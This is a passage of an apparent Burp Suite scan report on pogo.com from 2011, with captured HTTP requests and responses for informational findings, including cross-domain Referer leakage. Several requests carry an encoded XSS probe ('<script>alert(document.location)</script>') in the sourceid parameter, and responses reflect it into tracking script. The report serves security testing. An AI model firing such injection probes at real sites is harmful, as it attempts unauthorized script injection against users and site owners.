               <b class="tL">&nbsp;</b><b class="tR">&nbsp;</b>
               <div class="moduleContent">
                   Oops, something is not right...
               </div>
               <b class="bL">&nbsp;</b><b class="bR">&nbsp;</b>
           </div>
           <div class="clear10"></div>
           <div class="whiteModule mainContent">
               <b class="tL">&nbsp;</b><b class="tR">&nbsp;</b>
               <div class="moduleContent">
                   
<h1>The page you requested could not be found.</h1>

<p>Please check the URL for proper spelling and capitalization. If you're having trouble finding a particular page try visiting the<br />
<strong><a href="http://www.pogo.com/">Pogo.com home page</a></strong> or <strong><a href="http://www.pogo.com/sitemap">sitemap</a></strong>
<div class="clear20"></div>

               </div>
               <b class="bL">&nbsp;</b><b class="bR">&nbsp;</b>
           </div>
       </div>
   

   

</div>
</body>
</html>

Request 2

GET /login/Scripts/AC_RunActiveContent.js HTTP/1.1
Host: www.pogo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: com.pogo.site=pogo; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1308922690996-New%7C1311514690996%3B; prod.JID=DFBED573C399BE6DE0C56C9A43B58D50.000274; com.pogo.unid=6618939740244558

Response 2

HTTP/1.1 404 /login/Scripts/AC_RunActiveContent.js
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:38:23 GMT
Server: Apache-Coyote/1.1
Content-Length: 4013


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   <title>
   Pogo:
   Error: Invalid URL
   </title>
   


...[SNIP]...
nkTrackVars=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.pogo.com/login/Scripts/AC_RunActiveContent.js";
s.eVar2="pogo";
s.pageName="ERROR: Invalid URL Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:error::ERROR: Invalid URL Page:Non Authenticated";
s.prop8="Non Authenticated";
if (typeof(omniture_java_version) != "undefined") { s.prop13=omniture_java_version; }
if (typeof(omniture_plugin_used) != "undefined") { s.prop24=omniture_plugin_used; }
s.eVar10=s.getTimeParting('h','-5','2011');
s.retrieveLightProfiles = 'lsccmp';
var s_code=s.t();if(s_code)document.write(s_code);
//--></script>
</div>
<!-- end of Omniture Tag -->




<div class="clear20"></div>
<div align="center">
   
   <img src="http://cdn.pogo.com/v/EhaoWQ/img/header/main/en_US/pogo/header-sec-auth-756.jpg" alt="" /><br />
   
       <div id="bodyWrap">
           <div class="whiteModule" id="pageHeader">
               <b class="tL">&nbsp;</b><b class="tR">&nbsp;</b>
               <div class="moduleContent">
                   Oops, something is not right...
               </div>
               <b class="bL">&nbsp;</b><b class="bR">&nbsp;</b>
           </div>
           <div class="clear10"></div>
           <div class="whiteModule mainContent">
               <b class="tL">&nbsp;</b><b class="tR">&nbsp;</b>
               <div class="moduleContent">
                   
<h1>The page you requested could not be found.</h1>

<p>Please check the URL for proper spelling and capitalization. If you're having trouble finding a particular page try visiting the<br />
<strong><a href="http://www.pogo.com/">Pogo.com home page</a></strong> or <strong><a href="http://www.pogo.com/sitemap">sitemap</a></strong>
<div class="clear20"></div>

               </div>
               <b class="bL">&nbsp;</b><b class="bR">&nbsp;</b>
           </div>
       </div>
   

   

</div>
</body>
</html>


3.2. http://www.pogo.com/login/media/Pogo_General_LP_2.swf  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.pogo.com
Path:   /login/media/Pogo_General_LP_2.swf

Request 1

GET /login/media/Pogo_General_LP_2.swf HTTP/1.1
Host: www.pogo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/login/entry.jsp?sl=1&site=pogo&redr=http%3A%2F%2Fwww.pogo.com%2Fpogo-online-games%2Flp-GeneralPogo-withoutFB.jsp%3Fad%3D6429295350%26sourceid%3Dfree_internet_games_Broad_Free_GOO_C0080_A0001_LP000112f2b%25253c%25252fscript%25253e%25253cscript%25253ealert%252528document.location%252529%25253c%25252fscript%25253ec356c9d923d%26kw%3Dfree%2Binternet%2Bgames%26sitetarget%3D
Cookie: com.pogo.site=pogo; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1308922705451-New%7C1311514705451%3B; prod.JID=DFBED573C399BE6DE0C56C9A43B58D50.000274; com.pogo.unid=6618939740244558

Response 1

HTTP/1.1 404 /login/media/Pogo_General_LP_2.swf
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:38:24 GMT
Server: Apache-Coyote/1.1
Content-Length: 4347


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   <title>
   Pogo:
   Error: Invalid URL
   </title>
   


...[SNIP]...
nkTrackVars=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.pogo.com/login/entry.jsp?sl=1&site=pogo&redr=http%3A%2F%2Fwww.pogo.com%2Fpogo-online-games%2Flp-GeneralPogo-withoutFB.jsp%3Fad%3D6429295350%26sourceid%3Dfree_internet_games_Broad_Free_GOO_C0080_A0001_LP000112f2b%25253c%25252fscript%25253e%25253cscript%25253ealert%252528document.location%252529%25253c%25252fscript%25253ec356c9d923d%26kw%3Dfree%2Binternet%2Bgames%26sitetarget%3D";
s.eVar2="pogo";
s.pageName="ERROR: Invalid URL Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:error::ERROR: Invalid URL Page:Non Authenticated";
s.prop8="Non Authenticated";
if (typeof(omniture_java_version) != "undefined") { s.prop13=omniture_java_version; }
if (typeof(omniture_plugin_used) != "undefined") { s.prop24=omniture_plugin_used; }
s.eVar10=s.getTimeParting('h','-5','2011');
s.retrieveLightProfiles = 'lsccmp';
var s_code=s.t();if(s_code)document.write(s_code);
//--></script>
</div>
<!-- end of Omniture Tag -->




<div class="clear20"></div>
<div align="center">
   
   <img src="http://cdn.pogo.com/v/EhaoWQ/img/header/main/en_US/pogo/header-sec-auth-756.jpg" alt="" /><br />
   
       <div id="bodyWrap">
           <div class="whiteModule" id="pageHeader">
               <b class="tL">&nbsp;</b><b class="tR">&nbsp;</b>
               <div class="moduleContent">
                   Oops, something is not right...
               </div>
               <b class="bL">&nbsp;</b><b class="bR">&nbsp;</b>
           </div>
           <div class="clear10"></div>
           <div class="whiteModule mainContent">
               <b class="tL">&nbsp;</b><b class="tR">&nbsp;</b>
               <div class="moduleContent">
                   
<h1>The page you requested could not be found.</h1>

<p>Please check the URL for proper spelling and capitalization. If you're having trouble finding a particular page try visiting the<br />
<strong><a href="http://www.pogo.com/">Pogo.com home page</a></strong> or <strong><a href="http://www.pogo.com/sitemap">sitemap</a></strong>
<div class="clear20"></div>

               </div>
               <b class="bL">&nbsp;</b><b class="bR">&nbsp;</b>
           </div>
       </div>
   

   

</div>
</body>
</html>

Request 2

GET /login/media/Pogo_General_LP_2.swf HTTP/1.1
Host: www.pogo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: com.pogo.site=pogo; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1308922705451-New%7C1311514705451%3B; prod.JID=DFBED573C399BE6DE0C56C9A43B58D50.000274; com.pogo.unid=6618939740244558

Response 2

HTTP/1.1 404 /login/media/Pogo_General_LP_2.swf
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:38:25 GMT
Server: Apache-Coyote/1.1
Content-Length: 4010


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   <title>
   Pogo:
   Error: Invalid URL
   </title>
   


...[SNIP]...
nkTrackVars=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.pogo.com/login/media/Pogo_General_LP_2.swf";
s.eVar2="pogo";
s.pageName="ERROR: Invalid URL Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:error::ERROR: Invalid URL Page:Non Authenticated";
s.prop8="Non Authenticated";
if (typeof(omniture_java_version) != "undefined") { s.prop13=omniture_java_version; }
if (typeof(omniture_plugin_used) != "undefined") { s.prop24=omniture_plugin_used; }
s.eVar10=s.getTimeParting('h','-5','2011');
s.retrieveLightProfiles = 'lsccmp';
var s_code=s.t();if(s_code)document.write(s_code);
//--></script>
</div>
<!-- end of Omniture Tag -->




<div class="clear20"></div>
<div align="center">
   
   <img src="http://cdn.pogo.com/v/EhaoWQ/img/header/main/en_US/pogo/header-sec-auth-756.jpg" alt="" /><br />
   
       <div id="bodyWrap">
           <div class="whiteModule" id="pageHeader">
               <b class="tL">&nbsp;</b><b class="tR">&nbsp;</b>
               <div class="moduleContent">
                   Oops, something is not right...
               </div>
               <b class="bL">&nbsp;</b><b class="bR">&nbsp;</b>
           </div>
           <div class="clear10"></div>
           <div class="whiteModule mainContent">
               <b class="tL">&nbsp;</b><b class="tR">&nbsp;</b>
               <div class="moduleContent">
                   
<h1>The page you requested could not be found.</h1>

<p>Please check the URL for proper spelling and capitalization. If you're having trouble finding a particular page try visiting the<br />
<strong><a href="http://www.pogo.com/">Pogo.com home page</a></strong> or <strong><a href="http://www.pogo.com/sitemap">sitemap</a></strong>
<div class="clear20"></div>

               </div>
               <b class="bL">&nbsp;</b><b class="bR">&nbsp;</b>
           </div>
       </div>
   

   

</div>
</body>
</html>


3.3. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.pogo.com
Path:   /pogo-online-games/lp-GeneralPogo-withoutFB.jsp

Request 1

GET /pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP000112f2b%253c%252fscript%253e%253cscript%253ealert%2528document.location%2529%253c%252fscript%253ec356c9d923d&ad=6429295350&kw=free+internet+games&sitetarget= HTTP/1.1
Host: www.pogo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/5
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1308922357774-New%7C1311514357774%3B; prod.JID=C84030ABB66027F38F1EBD321C1C3F57.000144; com.pogo.unid=6618922560387636

Response 1

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:37:02 GMT
Server: Apache-Coyote/1.1
Content-Length: 12415


                       <html>
<head>

   <title>Pogo.com - The Ultimate Online Gaming Experience!</title>


   <link rel="StyleSheet" href="/v/FO57ZA/include/css/misc/marketing/landing.css"/>

   <sc
...[SNIP]...
fier;
s.linkTrackVars=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://burp/show/5";
s.eVar2="pogo";
s.pageName="Template without FB Marketing Landing Page";
s.prop2="pogo";
s.eVar12="6618922560387636";
s.campaign="free_internet_games_Broad_Free_GOO_C0080_A0001_LP000112f2b%253c%252fscript%253e%253cscript%253ealert%2528document.location%2529%253c%252fscript%253ec356c9d923d";
s.channel="games";
s.prop7="POGO:games:marketing::Template without FB Marketing Landing Page:Non Authenticated";
s.prop8="Non Authenticated";
if (typeof(omniture_java_version) != "undefined") { s.prop13=omniture_java_version; }
if (typeof(omniture_plugin_used) != "undefined") { s.prop24=omniture_plugin_used; }
s.eVar10=s.getTimeParting('h','-5','2011');
s.retrieveLightProfiles = 'lsccmp';
var s_code=s.t();if(s_code)document.write(s_code);
//--></script>
</div>
<!-- end of Omniture Tag -->







<img src="http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Pogo/Retarget_Nonsecure@Bottom3" width="1" height="1" border="0">



<div align="center">



   
   










   
   
       <link rel="StyleSheet" href="/include/css/pogo.css">
   
       <link rel="StyleSheet" href="/include/css/shared/pogo/header.css">
   
       <link rel="StyleSheet" href="/include/css/shared/footer.css">
   
       <link rel="StyleSheet" href="/include/css/shared/pogo/global.css">
   





<div align="center">




</div>


<table border=0 cellpadding=0 cellspacing=0 width=613 align=center>
<tr>
   <td><img src="http://cdn.pogo.com/v/EhaoWQ/img/header/main/en_US/pogo/header-sec-auth-756.jpg" /></td>
</tr>
</table>


   <div class="bodyContainer">
   <script type="text/javascript">
       AC_FL_RunContent( 'codebase','http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0','width','755','height','550','src','media/Pogo_General_LP_2','quality','high','pluginspage','http://www.macromedia.com/go/getflashplayer','movie','media/Pogo_General_LP_2','flashvars','subscribeLink=http%3A%2F%2Fwww.pogo.com%2Faction%2Fpogo%2FcreateAccount.do%3Fabenabled%3Dtrue' ); //end AC code
   </script>
<noscrip
...[SNIP]...

Request 2

GET /pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP000112f2b%253c%252fscript%253e%253cscript%253ealert%2528document.location%2529%253c%252fscript%253ec356c9d923d&ad=6429295350&kw=free+internet+games&sitetarget= HTTP/1.1
Host: www.pogo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1308922357774-New%7C1311514357774%3B; prod.JID=C84030ABB66027F38F1EBD321C1C3F57.000144; com.pogo.unid=6618922560387636

Response 2

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:37:06 GMT
Server: Apache-Coyote/1.1
Content-Length: 12681


                       <html>
<head>

   <title>Pogo.com - The Ultimate Online Gaming Experience!</title>


   <link rel="StyleSheet" href="/v/FO57ZA/include/css/misc/marketing/landing.css"/>

   <sc
...[SNIP]...
fier;
s.linkTrackVars=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP000112f2b%253c%252fscript%253e%253cscript%253ealert%2528document.location%2529%253c%252fscript%253ec356c9d923d&ad=6429295350&kw=free+internet+games&sitetarget=";
s.eVar2="pogo";
s.pageName="Template without FB Marketing Landing Page";
s.prop2="pogo";
s.eVar12="6618922560387636";
s.campaign="free_internet_games_Broad_Free_GOO_C0080_A0001_LP000112f2b%253c%252fscript%253e%253cscript%253ealert%2528document.location%2529%253c%252fscript%253ec356c9d923d";
s.channel="games";
s.prop7="POGO:games:marketing::Template without FB Marketing Landing Page:Non Authenticated";
s.prop8="Non Authenticated";
if (typeof(omniture_java_version) != "undefined") { s.prop13=omniture_java_version; }
if (typeof(omniture_plugin_used) != "undefined") { s.prop24=omniture_plugin_used; }
s.eVar10=s.getTimeParting('h','-5','2011');
s.retrieveLightProfiles = 'lsccmp';
var s_code=s.t();if(s_code)document.write(s_code);
//--></script>
</div>
<!-- end of Omniture Tag -->







<img src="http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Pogo/Retarget_Nonsecure@Bottom3" width="1" height="1" border="0">



<div align="center">



   
   










   
   
       <link rel="StyleSheet" href="/include/css/pogo.css">
   
       <link rel="StyleSheet" href="/include/css/shared/pogo/header.css">
   
       <link rel="StyleSheet" href="/include/css/shared/footer.css">
   
       <link rel="StyleSheet" href="/include/css/shared/pogo/global.css">
   





<div align="center">




</div>


<table border=0 cellpadding=0 cellspacing=0 width=613 align=center>
<tr>
   <td><img src="http://cdn.pogo.com/v/EhaoWQ/img/header/main/en_US/pogo/header-sec-auth-756.jpg" /></td>
</tr>
</table>


   <div class="bodyContainer">
   <script type="text/javascript">
       AC_FL_RunContent( 'codebase','http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0','width','755','height','550','src','media/Pogo_General
...[SNIP]...

4. Cross-domain Referer leakage  previous  next
There are 6 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


4.1. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /pogo-online-games/lp-GeneralPogo-withoutFB.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP000112f2b%253c%252fscript%253e%253cscript%253ealert%2528document.location%2529%253c%252fscript%253ec356c9d923d&ad=6429295350&kw=free+internet+games&sitetarget= HTTP/1.1
Host: www.pogo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/5
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1308922357774-New%7C1311514357774%3B; prod.JID=C84030ABB66027F38F1EBD321C1C3F57.000144; com.pogo.unid=6618922560387636

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:37:02 GMT
Server: Apache-Coyote/1.1
Content-Length: 12415


                       <html>
<head>

   <title>Pogo.com - The Ultimate Online Gaming Experience!</title>


   <link rel="StyleSheet" href="/v/FO57ZA/include/css/misc/marketing/landing.css"/>

   <sc
...[SNIP]...
<!-- end of Omniture Tag -->


<img src="http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Pogo/Retarget_Nonsecure@Bottom3" width="1" height="1" border="0">


<div align="center">
...[SNIP]...
<noscript>
   <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0" width="755" height="550">
       <param name="movie" value="media/Pogo_General_LP_2.swf">
...[SNIP]...
<li><a href="http://www.clubpogo.com/?site=pogo&pageSection=footer_joinclubpogo">Club Pogo</a>
...[SNIP]...
<li><a href="http://www.info.ea.com/?pageSection=footer_corpinfo" rel="nofollow">Corporate Info</a>
...[SNIP]...
<li><a class="popup||1021|600|yes|true" href="http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice" rel="nofollow">Legal Notices</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="http://tos.ea.com/legalapp/WEBPRIVACY/US/en/PC/?pageSection=footer_privacy" rel="nofollow">Privacy Policy</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="http://tos.ea.com/legalapp/WEBTERMS/US/en/PC?pageSection=footer_tos" rel="nofollow">Terms of Service</a>
...[SNIP]...
<li><a href="http://www.ea.com/pc" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_pc')">PC Games</a>
...[SNIP]...
<li><a href="http://www.ea.com/wii" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_wii')">Wii</a></li>
   
       <li><a href="http://www.ea.com/online" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_online')">Web</a></li>
   
       <li><a href="http://www.ea.com/xbox-360" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_xbox')">Xbox 360</a>
...[SNIP]...
<li><a href="http://www.ea.com/ps3" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_ps')">PS3</a></li>
   
       <li><a href="http://www.ea.com/iphone" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_iphone')">iPhone</a>
...[SNIP]...
<li><a href="http://www.ea.com/ipad" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_ipad')">iPad</a></li>
   
       <li><a href="http://www.ea.com/mobile" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_mobile')">Mobile</a>
...[SNIP]...
</div>
       
           
                           <iframe width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=778675133"></iframe>
...[SNIP]...

4.2. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /pogo-online-games/lp-GeneralPogo-withoutFB.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&ad=6429295350&kw=free+internet+games&sitetarget= HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=3E01A5E24CD32774E6EF83CEAF1EADF3.000099; com.pogo.unid=6618690632146297

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 24 Jun 2011 13:30:21 GMT
Server: Apache-Coyote/1.1
Content-Length: 12393


                       <html>
<head>

   <title>Pogo.com - The Ultimate Online Gaming Experience!</title>


   <link rel="StyleSheet" href="/v/FO57ZA/include/css/misc/marketing/landing.css"/>

   <sc
...[SNIP]...
<!-- end of Omniture Tag -->


<img src="http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Pogo/Retarget_Nonsecure@Bottom3" width="1" height="1" border="0">


<div align="center">
...[SNIP]...
<noscript>
   <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0" width="755" height="550">
       <param name="movie" value="media/Pogo_General_LP_2.swf">
...[SNIP]...
<li><a href="http://www.clubpogo.com/?site=pogo&pageSection=footer_joinclubpogo">Club Pogo</a>
...[SNIP]...
<li><a href="http://www.info.ea.com/?pageSection=footer_corpinfo" rel="nofollow">Corporate Info</a>
...[SNIP]...
<li><a class="popup||1021|600|yes|true" href="http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice" rel="nofollow">Legal Notices</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="http://tos.ea.com/legalapp/WEBPRIVACY/US/en/PC/?pageSection=footer_privacy" rel="nofollow">Privacy Policy</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="http://tos.ea.com/legalapp/WEBTERMS/US/en/PC?pageSection=footer_tos" rel="nofollow">Terms of Service</a>
...[SNIP]...
<li><a href="http://www.ea.com/pc" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_pc')">PC Games</a>
...[SNIP]...
<li><a href="http://www.ea.com/wii" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_wii')">Wii</a></li>
   
       <li><a href="http://www.ea.com/online" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_online')">Web</a></li>
   
       <li><a href="http://www.ea.com/xbox-360" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_xbox')">Xbox 360</a>
...[SNIP]...
<li><a href="http://www.ea.com/ps3" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_ps')">PS3</a></li>
   
       <li><a href="http://www.ea.com/iphone" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_iphone')">iPhone</a>
...[SNIP]...
<li><a href="http://www.ea.com/ipad" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_ipad')">iPad</a></li>
   
       <li><a href="http://www.ea.com/mobile" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('un_fteapt_mobile')">Mobile</a>
...[SNIP]...
</div>
       
           
                           <iframe width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=1256050592"></iframe>
...[SNIP]...

4.3. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /pogo-online-games/lp-GeneralPogo-withoutFB.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP000112f2b%253c%252fscript%253e%253cscript%253ealert%25280x0062%2529%253c%252fscript%253ec356c9d923d&ad=6429295350&kw=free+internet+games&sitetarget= HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://burp/show/10
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1308922746786-New%7C1311514746786%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; prod.JID=90D3F4A69128A7854F9C9566E6366546.000224; com.pogo.unid=6619034229533155

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
